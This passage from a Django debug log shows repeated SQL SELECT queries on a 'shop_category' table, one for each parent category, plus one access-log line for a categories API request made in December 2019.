"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:13:49,469 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:13:49,472 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:13:49,476 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:13:49,479 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:13:49,482 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:13:49,485 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:13:49,489 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:13:49,491 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:13:49,494 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:13:49,496 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:13:49,498 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:13:49,501 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:13:49,504 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:13:49,506 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:13:49,508 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:13:49,510 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:13:49,512 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:13:49,515 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:13:49,517 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:13:49,519 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:13:49,522 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:13:49,524 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:13:49] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:13:49,850 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:13:49,861 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:13:49,866 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:13:49,870 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:13:49,876 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:13:49,880 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:13:49,883 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:13:49,887 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:13:49,891 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:13:49,896 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:13:49,900 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:13:49,903 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:13:49,907 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:13:49,910 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:13:49,916 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:13:49,919 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:13:49,923 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:13:49,926 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:13:49,930 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:13:49,936 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:13:49,940 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:13:49,944 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:13:49,949 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:13:49,953 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:13:49,958 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:13:49,963 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:13:49,967 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:13:49,970 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:13:49,974 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:13:49,977 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:13:49,983 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:13:49,986 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:13:49,990 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:13:49,994 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:13:50,001 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:13:50,008 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:13:50,012 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:13:50,016 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:13:50,020 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:13:50,024 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:13:50,028 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:13:50,032 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:13:50,036 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:13:50,040 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:13:50,045 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) 